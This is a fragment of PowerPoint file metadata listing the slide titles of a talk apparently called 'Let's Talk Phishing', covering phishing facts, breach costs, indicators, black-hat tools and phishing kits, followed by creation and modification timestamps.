      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Let’s Talk Phishing</vt:lpstr>
      <vt:lpstr>About this talk</vt:lpstr>
      <vt:lpstr>Phishing Defined</vt:lpstr>
      <vt:lpstr>Company Security- Some Phishing Facts</vt:lpstr>
      <vt:lpstr>Some Big Breaches and Costs</vt:lpstr>
      <vt:lpstr>Costs – Recent Examples</vt:lpstr>
      <vt:lpstr>Phishing Statistics</vt:lpstr>
      <vt:lpstr>Some stats from $employer</vt:lpstr>
      <vt:lpstr>Rubik’s Cat</vt:lpstr>
      <vt:lpstr>Phishing Indicators</vt:lpstr>
      <vt:lpstr>And what if YOU want to be evil?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Try Hard 2: Try Harder</vt:lpstr>
      <vt:lpstr>Learning Time</vt:lpstr>
      <vt:lpstr>Just 4 U</vt:lpstr>
      <vt:lpstr>Some Fresh Black Hat Tools</vt:lpstr>
      <vt:lpstr>Some Fresh Black Hat Tools</vt:lpstr>
      <vt:lpstr>ActiveAntiPhish</vt:lpstr>
      <vt:lpstr>Looking At The Kits</vt:lpstr>
      <vt:lpstr>Looking At The Kits</vt:lpstr>
      <vt:lpstr>Theory</vt:lpstr>
      <vt:lpstr>Saturation!!!</vt:lpstr>
      <vt:lpstr>Drinking from the firehose</vt:lpstr>
      <vt:lpstr>Drinking from the firehose</vt:lpstr>
      <vt:lpstr>What this does</vt:lpstr>
      <vt:lpstr>Where do I get this glory?!?</vt:lpstr>
      <vt:lpstr>Take a picture</vt:lpstr>
      <vt:lpstr>Well that’s just about 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2017-02-27T22:03:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-06T17:47:35Z</dcterms:modified>
</cp:coreProperties>
</file>